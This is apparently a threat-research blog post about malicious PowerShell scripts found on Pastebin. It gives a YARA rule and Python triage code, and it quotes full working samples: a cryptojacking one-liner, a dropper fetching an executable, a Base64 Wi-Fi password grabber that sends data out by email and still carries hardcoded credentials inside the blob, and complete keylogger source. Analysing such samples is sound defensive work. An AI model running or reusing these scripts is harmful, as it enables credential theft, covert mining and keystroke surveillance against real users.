Sketchy Powershell Scripts on Pastebin

2021, Aug 18

A project that I have been running on and off since 2019 is a Pastebin scraper that looks for various types of threats. One of the most common and consistent threats I see is malicious PowerShell scripts.

Detection

So far I only use three different substrings to find malicious scripts, as shown in the YARA rule below.

rule Malicious_Powershell
{
		meta:
			author = "Jon Lein"
			date = "10/22/2020"
			description = "Things in PowerShell scripts that have the potential to do harm."
		strings:
			$Hidden_Window = "-WindowStyle hidden"
			$Execution_policy = "-ExecutionPolicy ByPass"
			$Download_String = "DownloadString("

		condition:
			$Hidden_Window or $Execution_policy or $Download_String
}

1) “-WindowStyle hidden” lets the script execute without displaying a window. This keeps the attack slightly more hidden from the user, increasing the odds that the script runs long enough for the attacker to succeed.

2) “-ExecutionPolicy ByPass” tries to make sure there aren’t any policies in place to prevent the attacker’s script from executing. There could be a policy in place requiring that scripts be digitally signed before they can be executed.

3) “DownloadString(” simply allows an attacker to pass a URL and download content from the Internet. Often this will be another script to execute inside the PowerShell script.

CryptoJacking

CryptoJacking is a technique attackers use to hijack resources on a victim computer to mine cryptocurrency. This script downloads mining software called xmrig directly from GitHub. It simply downloads a .bat file and passes it a Monero wallet address to start mining. This technique appears very often on my IoT honeypots, so I’m not surprised to see it adapted here for Windows machines.

powershell -Command "$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; $wc.DownloadFile('https://raw.githubusercontent.com/MoneroOcean/xmrig_setup/master/setup_moneroocean_miner.bat', $tempfile); & $tempfile '42w1byK8h8e9AWw6S3nDK2VivKNW5REkUagtQCUskV83TngCpkqDkMuU79g7q1Q4TCPmr6am81wh2DH3GsGtkbcFKM5kUov'; Remove-Item -Force $tempfile"

Droppers

A dropper is a stage in malware that simply downloads a new executable or code onto a victim computer. This GitHub link is dead, so I’m not sure what they are trying to accomplish.

powershell -NoP -NonI -W Hidden -Exec Bypass "IEX (New-Object System.Net.WebClient).DownloadFile('https://github.com/rq6/1/raw/master/Client.exe',\"$env:temp\Client.exe\"); Start-Process \"$env:temp\Client.exe\""
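The YARA rule above matches its three strings literally, and YARA strings are case-sensitive unless marked nocase. powershell.exe also accepts any unambiguous prefix of a parameter name, so the dropper above spells the same switches as -W Hidden and -Exec Bypass, and it calls DownloadFile rather than DownloadString; none of the three literal strings occurs in it. The Python below is an added example, not code from the original post or its scraper: it reproduces the rule's literal check and puts a broadened, case-insensitive, prefix-aware version of the same three indicators beside it, then runs both over command lines constructed for this example (the minimum prefix lengths and the example.invalid URLs are assumptions).

```python
"""Check paste text against the post's three indicators, two ways.

Added example, not part of the original post or its scraper: the literal strings
from the YARA rule are compared with broadened patterns that also catch the
abbreviated parameter names (-W, -Exec) and lower-case spellings that appear in
the post's samples. The command lines below are constructed for this example.
"""
import re
from typing import Dict, List

# The three strings from the post's rule. YARA strings are case-sensitive unless
# marked `nocase`, so a plain substring test reproduces the rule as written.
LITERAL_STRINGS: Dict[str, str] = {
    "Hidden_Window": "-WindowStyle hidden",
    "Execution_policy": "-ExecutionPolicy ByPass",
    "Download_String": "DownloadString(",
}


def _prefixes(name: str, min_len: int) -> str:
    """Regex alternation for every prefix of `name` that is at least `min_len` long.

    powershell.exe accepts any unambiguous prefix of a parameter name (-W for
    -WindowStyle, -Exec for -ExecutionPolicy). The minimum lengths used below
    are an assumption; the shortest unambiguous prefix depends on the full
    parameter list of the PowerShell version in use.
    """
    alternatives = [re.escape(name[:i]) for i in range(len(name), min_len - 1, -1)]
    return "(?:" + "|".join(alternatives) + ")"


# Broadened equivalents of the same three indicators (added here, not in the rule).
BROAD_PATTERNS: Dict[str, "re.Pattern[str]"] = {
    "Hidden_Window": re.compile(r"-" + _prefixes("WindowStyle", 1) + r"\s+hidden\b", re.I),
    "Execution_policy": re.compile(r"-" + _prefixes("ExecutionPolicy", 2) + r"\s+bypass\b", re.I),
    # WebClient also exposes DownloadFile and DownloadData; the dropper uses DownloadFile.
    "Download_String": re.compile(r"\.Download(?:String|File|Data)\s*\(", re.I),
}


def literal_hits(text: str) -> List[str]:
    """Indicator names whose literal YARA string occurs in `text`."""
    return [name for name, s in LITERAL_STRINGS.items() if s in text]


def broad_hits(text: str) -> List[str]:
    """Indicator names whose broadened pattern occurs in `text`."""
    return [name for name, pattern in BROAD_PATTERNS.items() if pattern.search(text)]


def is_suspicious(text: str) -> bool:
    """The rule's `or` condition, evaluated over the broadened patterns."""
    return bool(broad_hits(text))


# Constructed samples shaped like the ones in the post (URLs replaced).
SAMPLES: Dict[str, str] = {
    "canonical": "powershell -WindowStyle hidden -ExecutionPolicy ByPass "
                 "-Command \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')\"",
    "lowercase": "powershell -windowstyle hidden -ExecutionPolicy ByPass -File w.PS1",
    "abbreviated": "powershell -NoP -NonI -W Hidden -Exec Bypass "
                   "\"(New-Object System.Net.WebClient).DownloadFile('http://example.invalid/Client.exe', 'c.exe')\"",
    "benign": "powershell -NoProfile -Command Get-Process",
}

if __name__ == "__main__":
    for label, command in SAMPLES.items():
        print(f"{label:12} literal={literal_hits(command)} broad={broad_hits(command)}")
```

Run as a script it prints, per sample, which indicators the literal strings catch and which the broadened patterns catch; the abbreviated dropper-style line is the one where the two disagree on all three counts. The prefix alternation is generated rather than typed out so the same helper can be reused for any other switch worth watching.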

Wifi Grabber and other Redteam Scripts

This style of script is one of the most common patterns I see with PowerShell scripts. This script echoes a Base64 string into a file, decodes it with certutil, and executes the result.

echo bmV0c2ggd2xhbiBleHBvcnQgcHJvZmlsZSBrZXk9Y2xlYXIKCmVjaG8gIldpZmkgUGFzc3dvcmQgR3JhYmJlciBieSBTYWxlaCBJLiIgPiB3aWZpcGFzcy50eHQKZGlyICoueG1sIHwlIHsKJHhtbD1beG1sXSAoZ2V0LWNvbnRlbnQgJF8pCiRhPSAiPT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PWByYG4gU1NJRCA9ICIrJHhtbC5XTEFOUHJvZmlsZS5TU0lEQ29uZmlnLlNTSUQubmFtZSArICJgcmBuIFBBU1MgPSAiICskeG1sLldMQU5Qcm9maWxlLk1TTS5TZWN1cml0eS5zaGFyZWRLZXkua2V5bWF0ZXJpYWwKCk91dC1GaWxlIHdpZmlwYXNzLnR4dCAtQXBwZW5kIC1JbnB1dE9iamVjdCAkYQoKfQoKCiRTTVRQU2VydmVyID0gJ3NtdHAuZ21haWwuY29tJwoKCiAgJFNNVFBJbmZvID0gTmV3LU9iamVjdCBOZXQuTWFpbC5TbXRwQ2xpZW50KCRTbXRwU2VydmVyLCA1ODcpCgoKICAkU01UUEluZm8uRW5hYmxlU3NsID0gJHRydWUKCgogICRTTVRQSW5mby5DcmVkZW50aWFscyA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5OZXR3b3JrQ3JlZGVudGlhbCgnYWxpZW5leGUxOTk3MDJAZ21haWwuY29tJywgJ0FsaWVuRXhlJykKCgogICRSZXBvcnRFbWFpbCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5NYWlsLk1haWxNZXNzYWdlCgoKICAkUmVwb3J0RW1haWwuRnJvbSA9ICdtYW51ZXl5eUBnbWFpbC5jb20nCgoKICAkUmVwb3J0RW1haWwuVG8uQWRkKCdtYW51ZWxzY2h1bHpAaG90bWFpbC5jaCcpCgoKICAkUmVwb3J0RW1haWwuU3ViamVjdCA9ICdXSUZJIFBhc3N3b3J0IExpc3RlIHZvbiAnICsgJGVudjpVc2VyTmFtZQoKCiAgJFJlcG9ydEVtYWlsLkJvZHkgPSAnRGllc2UgTmFjaHJpY2h0IHd1cmRlIG1pdCBlaW5lbSBNb2RpZml6aWVydGVuIFVTQi1TdGljayBnZXNlbmRldCcKCgogICRSZXBvcnRFbWFpbC5BdHRhY2htZW50cy5BZGQoJ3dpZmlwYXNzLnR4dCcpCgoKICAkU01UUEluZm8uU2VuZCgkUmVwb3J0RW1haWwpCgpybSAqLnhtbCAtRm9yY2UKcm0gdy50eHQgLUZvcmNlCnJtIHcuUFMxIC1Gb3JjZQpSZW1vdmUtSXRlbVByb3BlcnR5IC1QYXRoICdIS0NVOlxTb2Z0d2FyZVxNaWNyb3NvZnRcV2luZG93c1xDdXJyZW50VmVyc2lvblxFeHBsb3JlclxSdW5NUlUnIC1OYW1lICcqJyAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZQo= > w.txt

certutil -decode w.txt w.PS1

powershell  -windowstyle hidden -ExecutionPolicy ByPass  -File w.PS1
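The three lines above are the whole first stage; everything the script actually does is inside the Base64 blob. The Python below is an added example, not code from the original post: it recovers the second stage the way a triage script would, by decoding the blob offline instead of letting certutil and powershell run, and then lists where the decoded script sends data and what it deletes afterwards. The paste and the second-stage script in it are constructed and only mimic the shape of the sample above (SMTP setup, attachment, file cleanup and the RunMRU wipe) with every host and credential replaced; the choice of e-mail and cleanup lines to pull out is an assumption about what a responder reads first.

```python
"""Recover and triage the second stage of an echo / certutil / powershell chain.

Added example, not part of the original post. The first stage only writes a Base64
blob to disk and asks certutil to decode it, so the real script can be recovered
by decoding that blob offline instead of running anything. The paste and the
second-stage script below are constructed for this example and only mimic the
shape of the one in the post: they send nothing and point at example.invalid.
"""
import base64
import binascii
import re
from typing import Dict, List, Optional

# Step 1: a Base64 blob echoed into a file.  Step 2: certutil decoding that file.
# Step 3: powershell running the decoded file.
ECHO_RE = re.compile(r"^\s*echo\s+([A-Za-z0-9+/=]{16,})\s*>\s*(\S+)\s*$", re.M)
CERTUTIL_RE = re.compile(r"^\s*certutil(?:\.exe)?\s+-decode\s+(\S+)\s+(\S+)\s*$", re.M | re.I)
RUN_RE = re.compile(r"^\s*powershell(?:\.exe)?\s+.*?-File\s+(\S+)", re.M | re.I)


def decode_staged_script(paste: str) -> Optional[Dict[str, str]]:
    """Return the decoded second stage if the three steps chain on the same files."""
    echo, cert, run = ECHO_RE.search(paste), CERTUTIL_RE.search(paste), RUN_RE.search(paste)
    if not (echo and cert and run):
        return None
    blob, encoded_file = echo.group(1), echo.group(2)
    decoded_file = cert.group(2)
    if cert.group(1) != encoded_file or decoded_file.lower() != run.group(1).lower():
        return None  # the steps do not refer to one another; not this pattern
    try:
        script = base64.b64decode(blob, validate=True).decode("utf-8", errors="replace")
    except (binascii.Error, ValueError):
        return None  # echoed text is not valid Base64
    return {"encoded_file": encoded_file, "script_file": decoded_file, "script": script}


def triage(script: str) -> Dict[str, List[str]]:
    """Pull out the lines a responder reads first: where it sends data and what it deletes."""
    lines = [ln.strip() for ln in script.splitlines() if ln.strip()]
    return {
        "smtp_servers": re.findall(r"\$SMTPServer\s*=\s*['\"]([^'\"]+)['\"]", script, re.I),
        "exfil": [ln for ln in lines
                  if re.search(r"SmtpClient|Send-MailMessage|Attachments\.Add|\.Send\(", ln, re.I)],
        "cleanup": [ln for ln in lines
                    if re.match(r"(?:rm|del|Remove-Item|Remove-ItemProperty)\b", ln, re.I)],
    }


# Constructed second stage: the same SMTP setup, attachment, cleanup and RunMRU wipe
# as the post's sample, with every credential and host replaced (assumed values).
SECOND_STAGE = r"""$SMTPServer = 'smtp.example.invalid'
$SMTPInfo = New-Object Net.Mail.SmtpClient($SMTPServer, 587)
$ReportEmail.Attachments.Add('wifipass.txt')
$SMTPInfo.Send($ReportEmail)
rm w.txt -Force
rm w.PS1 -Force
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue
"""


def build_sample_paste(second_stage: str) -> str:
    """Wrap a script in the echo / certutil / powershell first stage seen in the post."""
    blob = base64.b64encode(second_stage.encode("utf-8")).decode("ascii")
    return (f"echo {blob} > w.txt\n\n"
            "certutil -decode w.txt w.PS1\n\n"
            "powershell  -windowstyle hidden -ExecutionPolicy ByPass  -File w.PS1\n")


SAMPLE_PASTE = build_sample_paste(SECOND_STAGE)

if __name__ == "__main__":
    stage = decode_staged_script(SAMPLE_PASTE)
    print("decoded", stage["script_file"], "from", stage["encoded_file"])
    for key, values in triage(stage["script"]).items():
        print(key, values)
```

The decoder insists that the three steps name the same files before it trusts the chain, which keeps unrelated echo or certutil lines in a paste from producing a false second stage; the decoded text can then be handed to whatever indicator check the scraper already runs.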

Decoded, the script looks like this. It is designed to grab the SSID and password for a Wi-Fi network and exfiltrate the data through e-mail. These scripts often use e-mail to exfiltrate, but that requires an e-mail address and password, which are often hardcoded into the script. I redacted those for this post, but have collected quite the list of credentials from scripts like these.

netsh wlan export profile key=clear

echo "Wifi Password Grabber by Saleh I." > wifipass.txt
dir *.xml |% {
$xml=[xml] (get-content $_)
$a= "========================================`r`n SSID = "+$xml.WLANProfile.SSIDConfig.SSID.name + "`r`n PASS = " +$xml.WLANProfile.MSM.Security.sharedKey.keymaterial

Out-File wifipass.txt -Append -InputObject $a

}


$SMTPServer = 'smtp.gmail.com'


  $SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)


  $SMTPInfo.EnableSsl = $true


  $SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('<REDACTED>', '<REDACTED>')


  $ReportEmail = New-Object System.Net.Mail.MailMessage


  $ReportEmail.From = <REDACTED>


  $ReportEmail.To.Add('<REDACTED>')


  $ReportEmail.Subject = 'WIFI Passwort Liste von ' + $env:UserName


  $ReportEmail.Body = 'Diese Nachricht wurde mit einem Modifizierten USB-Stick gesendet'


  $ReportEmail.Attachments.Add('wifipass.txt')


  $SMTPInfo.Send($ReportEmail)

rm *.xml -Force
rm w.txt -Force
rm w.PS1 -Force
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue

Keyloggers

Keyloggers are a type of malware used to record keystrokes made by a user. They can be used to collect credentials to compromise accounts. This one follows the same pattern as the Wi-Fi password grabber, decoding Base64 before executing the PowerShell script.

echo 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 > e.txt

certutil -decode e.txt e.PS1

powershell -windowstyle hidden -ExecutionPolicy ByPass  -File e.PS1

This script is quite a bit more complicated than the others. It uses SecureStrings so that the password for the e-mail address isn’t stored in clear text. It also needs to load several functions from user32.dll to capture and process the keystrokes. The rest of the script keeps looping to record keystrokes until a certain amount of time has passed. After that it sends the file containing all of the keys to the specified e-mail address.

$encryptU="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"|ConvertTo-SecureString;$x="JwBJAEEATQBKAFUAUwBUAEMATwBOAEYAVQBTAEkATgBHAFkATwBVAFQASABJAFMAQQBDAEMATwBVAE4AVABJAFMATgBPAFYAQQBMAFUARQBUAE8ATQBFACcA";$strU=[Runtime.InteropServices.Marshal]::PtrToStringAuto([Runtime.InteropServices.Marshal]::SecureStringToBSTR((($encryptU))));$From=powershell -encodedCommand $strU;$str="JwBJAEEATQBKAFUAUwBUAEMATwBOAEYAVQBTAEkATgBHAFkATwBVAFQASABJAFMAQQBDAEMATwBVAE4AVABJAFMATgBPAFYAQQBMAFUARQBUAE8ATQBFACcA"
$encryptP="01000000d08c9ddf0115d1118c7a00c04fc297eb01000000bccfbb297ee4734aa0aa84b8835f731e00000000020000000000106600000001000020000000ad4e95ae89b44893d092650567aa99d5b93f46e0d197fc81fd778f3e0851a683000000000e8000000002000020000000dfab8cf8fbcb17da32577f9c8ae7e65fedf40827521c6fab71f64328867c3502700000005a412a2b152c6474f79a48ee661c9c6f02ca36108dcaa7e2c3658d080b470137a78bcd33f1e4186ecf4e14a728449974f621564a73b8f72327ad7ea05e4e4f8d3edacd6662550c6275a03086fb5e17ce42b25c2536ae8568f23333e5134ed5cb0f084183ad54d4de7b59ec88033bb8bd40000000ed1fa717926c7695f4bf4f4d5b58f453f68b7255a1765a1e655776b2ca88fa0172c1815f7eaef9fe433df874994d90f7dd9cbce530dd85f588be9d1a1e04e108"|ConvertTo-SecureString;$y="JwBUAEgASQBTAEkAUwBKAFUAUwBUAEIAVQBOAEMASABPAEYARwBJAEIAQgBFAFIASQBTAEgAJwA=";$strP=[Runtime.InteropServices.Marshal]::PtrToStringAuto([Runtime.InteropServices.Marshal]::SecureStringToBSTR((($encryptP))));$Pass=powershell -encodedCommand $strP;$passw="JwBJAEEATQBKAFUAUwBUAEMATwBOAEYAVQBTAEkATgBHAFkATwBVAFQASABJAFMAQQBDAEMATwBVAE4AVABJAFMATgBPAFYAQQBMAFUARQBUAE8ATQBFACcA"
$RunTime=15
$Init=1
$To=<REDACTED>
$Subject="System Logged of "+$env:USERNAME;
$body="System Logged as of "+$StartTime;$body
$SMTPServer="smtp.mail.com";$SMTPPort="587"
$credentials = new-object Management.Automation.PSCredential $From, ($Pass | ConvertTo-SecureString -AsPlainText -Force)
#Goodluck Hacking this..!
$MyEmailUsername = "gAAAAABeD9BGrwXuP6--F_CS7yAtgs7KDDPb0ok6geAUc2gbOME4UkwkM7iUxXb3dtsGaZK6xzUVvME51Kz1gsssPirnsX4PZg1CmBp2lwD-L-479JwECsI='123"
$MyEmailPassword = "gAAAAABeD9C_Hndb3jDsR7HTZtwg2XS-pW9O1wkUYwLQp0MbAR9XoMCVPBG2M_dkQhjURwkSx_u94ODoAKznmbKgzWEf_pi607Ytb7Z3jrY22a6MRcA-wHs='123"
$StartTime = Get-Date
$EndTime = $StartTime.addminutes($RunTime)

#code: profexer
function SystemLogger($Path="C:\x64\system32.txt") 
{
  # Signatures for API Calls
  $signatures = @'
[DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)] 
public static extern short GetAsyncKeyState(int virtualKeyCode); 
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int GetKeyboardState(byte[] keystate);
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int MapVirtualKey(uint uCode, int uMapType);
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);
'@

  # load signatures and make members available
  $API = Add-Type -MemberDefinition $signatures -Name 'Win32' -Namespace API -PassThru
    
  # create output file
  $null = New-Item -Path $Path -ItemType File -Force

  try
  {

    # create endless loop. When user presses CTRL+C, finally-block
    # executes and shows the collected key presses
    $Runner = 0
	while ($RunTime  -ge $Runner) {
	while ($EndTime -ge $TimeNow) {
      Start-Sleep -Milliseconds 40
      
      # scan all ASCII codes above 8
      for ($ascii = 9; $ascii -le 254; $ascii++) {
        # get current key state
        $state = $API::GetAsyncKeyState($ascii)

        # is key pressed?
        if ($state -eq -32767) {
          $null = [console]::CapsLock

          # translate scan code to real code
          $virtualKey = $API::MapVirtualKey($ascii, 3)

          # get keyboard state for virtual keys
          $kbstate = New-Object Byte[] 256
          $checkkbstate = $API::GetKeyboardState($kbstate)

          # prepare a StringBuilder to receive input key
          $mychar = New-Object -TypeName System.Text.StringBuilder

          # translate virtual key
          $success = $API::ToUnicode($ascii, $virtualKey, $kbstate, $mychar, $mychar.Capacity, 0)

          if ($success) 
          {
            # add key to logger file
            [System.IO.File]::AppendAllText($Path, $mychar, [System.Text.Encoding]::Unicode) 
          }
        }
      }
	  $TimeNow = Get-Date
    }
	send-mailmessage -from $from -to $to -subject $Subject -body $body -Attachment $Path -smtpServer $smtpServer -port $SMTPPort -credential $credentials -usessl
	Remove-Item -Path $Path -force
	}
  }
  finally
  {
    # open logger file in Notepad
	exit 1
  }
}

# records all key presses until time in the script has been passed 
SystemLogger

Conclusion

PowerShell is a useful administrative tool, which also makes it a powerful tool for attackers. Many different types of attacks and malware techniques are possible with PowerShell, as shown above. There are many I still have not collected, such as social engineering scripts and ransomware, that I have read about but have not yet seen in the wild. Pastebin has gotten better at flagging and removing malicious content, so I’m not sure if encoded PowerShell through Pastebin will continue to be a viable technique.